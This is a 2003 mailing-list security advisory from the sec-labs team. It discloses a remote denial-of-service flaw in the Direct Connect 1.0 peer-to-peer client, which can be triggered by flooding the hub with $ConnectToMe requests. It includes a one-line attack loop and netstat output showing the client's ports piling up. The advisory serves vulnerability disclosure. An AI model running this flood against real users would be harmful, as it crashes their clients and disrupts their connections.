[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030714133719.271ce174.noreply@sec-labs.hack.pl>
From: noreply at sec-labs.hack.pl (sec-labs team)
Subject: [sec-labs] Remote Denial of Service vulnerability in NeoModus
Direct Connect 1.0 build 9
sec-labs team proudly presents:
Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
and probably newest version.
by Lord YuP
13/07/2003
I. BACKGROUND
Direct Connect is a windows (i've found also a linux version but
i don't have time to test it) p2p file-sharing program, well
common nowadays.
II. DESCRIPTION
Appending to aDe DC Client to Client HandShake looks like:
Client <-> Client Communication in DC. 11-05-2002. By aDe
----------------------------------------------------------
ACTIVE FILE DOWNLOAD
----------------------
D = downloader
U = uploader
H = hub
D>H: $ConnectToMe <U's username> <D's IP and port>|
H>U: $ConnectToMe <U's username> <D's IP and port>|
...bla bla ... ;)
As u can guess, the Direct Connect client after receiving
"$Connect ToMe..." command from hub, tries to connect to
specyfic IP and PORT sent by the Downloader.
The attacker (evil-downloader) can send infinite requests
to HUB with specyfic marked ip:port causing DoS attack
in the Victim's client.
Little example:
Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }
Client: (runned "netstat -a")
TCP jin:1993 JIN:0 LISTENING
TCP jin:1995 JIN:0 LISTENING
TCP jin:1996 JIN:0 LISTENING
TCP jin:2005 JIN:0 LISTENING
TCP jin:2006 JIN:0 LISTENING
TCP jin:2007 JIN:0 LISTENING
TCP jin:2008 JIN:0 LISTENING
TCP jin:2009 JIN:0 LISTENING
TCP jin:2010 JIN:0 LISTENING
TCP jin:2011 JIN:0 LISTENING
TCP jin:2012 JIN:0 LISTENING
TCP jin:2013 JIN:0 LISTENING
TCP jin:2014 JIN:0 LISTENING
TCP jin:2015 JIN:0 LISTENING
TCP jin:2016 JIN:0 LISTENING
TCP jin:2017 JIN:0 LISTENING
TCP jin:2018 JIN:0 LISTENING
TCP jin:2019 JIN:0 LISTENING
...and so on...
III. IMPACT
The attacked client may be DoS-ed in case of that internet connection
can be reseted/stopped, some clients may flood with the "Out of Memory"
msgboxes in case of that, system may be not working correctly, and DC
client may be terminated.
--
sec-labs team [http://sec-labs.hack.pl]
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030714/29c7e9bb/attachment.bin
Powered by blists - more mailing lists